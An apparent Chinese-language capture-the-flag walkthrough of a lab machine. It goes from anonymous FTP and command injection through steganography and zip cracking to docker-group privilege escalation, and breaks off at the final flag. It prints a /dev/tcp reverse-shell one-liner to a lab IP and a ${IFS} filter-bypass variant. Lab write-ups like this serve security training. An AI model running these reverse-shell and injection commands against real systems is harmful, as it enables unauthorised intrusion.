首先还是老规矩,扫描存活主机
然后开始信息收集,扫描端口
发现21端口已经开放,而且还是不用密码就可以直接登录
用户名是anonymous登录ftp,然后得到note.txt后,发现得到了一句话,先放着,留着备用
然后直接上目录扫描dirb
这个靶场简单扫描一下即可,不需要进行详细扫描等
按个访问一下扫描出的目录
看见了一个命令执行框,直接whoami一下看看
看看别的命令ifconfig
看看密码文件
发现要看密码文件的时候不让看了
简单的绕过试下cat
权限提升
直接用bash -i >&/dev/tcp/192.168.119.130/6666 0>&1,显然不行。
本地使用nc监听,利用${IFS}代空格绕过反弹shell
bash${IFS}-c${IFS}'bash${IFS}-i${IFS}>&/dev/tcp/192.168.119.130/6666 0>&1'
获得shell之后,翻一翻看sudo权限能否提权,apaar下有个sh文件貌似可以提权。
查看.helpline.sh文件只要msg输入为/bin/sh就能获得apaar的shell
这里要执行.helpline.sh 需要获得交互式TTY,利用python3获取交互式TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
获得apaar后就是提权,然后直接用apaar不能下载lse.sh(提权信息枚举脚本)
https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh
首先先弄一个交互界面
但是,这个apaar好像没有提升到root可利用的地方,lse.sh的执行结果忘记截图了。
然后下载提权sh脚本
果然,提权到root的用户不是这个apaar。再往之前可能遗漏的地方进行翻找。
在一个hacker.php中发现了一张jpg和一段话,在黑暗中寻找答案。突破点应该在那张图片里。
目录网站的同级目录,利用python3搭建一个网站
python3 -m http.server 8001
直接访问浏览器发现是一个可疑的图片,直接用wget下载到攻击机上
考虑到这个图片是不是有可能有图片隐写内容,
利用steghide工具查看图片里是否有隐藏的文件,提取到backup.zip文件,但是解压时加密了
这边利用的fcrackzip爆破工具, fcrackzip -p 指定一个字典,这边用的时rockyou。密码时pass1word
提取到sourec_code.php,像是个登录框。查看源码里面有base64加密的密码和登录成功会输出Anurodh这个用户名
获取账号和密码直接用ssh登录到目标机上
发现登录成功
还是利用lse.sh提权脚本,枚举可提权可利用的信息。
这里发现时在docker组里
在docker | GTFOBins查找提权的命令
输入以下命令,成功提权到root。(试了几种提权方法,还是这个比较正常,其它的多多少少有些问题)
最终拿到fla
